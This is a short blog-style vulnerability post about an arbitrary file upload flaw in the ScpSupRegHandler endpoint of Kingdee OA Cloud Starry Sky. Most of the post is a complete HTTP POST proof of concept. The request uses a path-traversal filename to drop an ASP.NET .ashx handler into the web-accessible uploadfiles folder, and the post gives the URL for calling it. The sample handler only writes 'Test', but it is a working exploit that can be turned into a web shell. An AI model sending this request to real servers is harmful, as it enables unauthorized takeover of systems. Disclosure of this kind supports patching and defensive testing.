Post

Kingdee Oa Cloud Starry Sky Scpsupreghandler Arbitrary File Upload Vulnerability

Posted
By Rhy0z
1 min read
Kingdee Oa Cloud Starry Sky Scpsupreghandler Arbitrary File Upload Vulnerability

Kingdee OA Cloud Starry Sky ScpSupRegHandler Any file upload vulnerability

Vulnerability Description

Kingdee OA Cloud Starry Sky ScpSupRegHandler interface has a vulnerability to upload any file. The attacker can upload any file to obtain server permissions through the vulnerability.

Vulnerability Impact

Kingdee OA Cloud Starry Sky

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: 
Accept-Encoding: identity
Content-Length: 973
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061

--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="dbId_v"

.
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FID"

2022
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."
Content-Type: text/plain

<%@ WebHandler Language="C#" Class="TestHandler" %>
        using System;
        using System.Web;
        public class TestHandler : IHttpHandler {
            public void
            ProcessRequest (HttpContext context) {
                context.Response.ContentType= "text/plain";
                context.Response.Write("Test");
            }
            public bool IsReusable {
                get {return false; }
            }
        }
--2ac719f8e29343df94aa4ab49e456061--

img

1

/K3Cloud/uploadfiles/Test.ashx
This post is licensed under CC BY 4.0 by the author.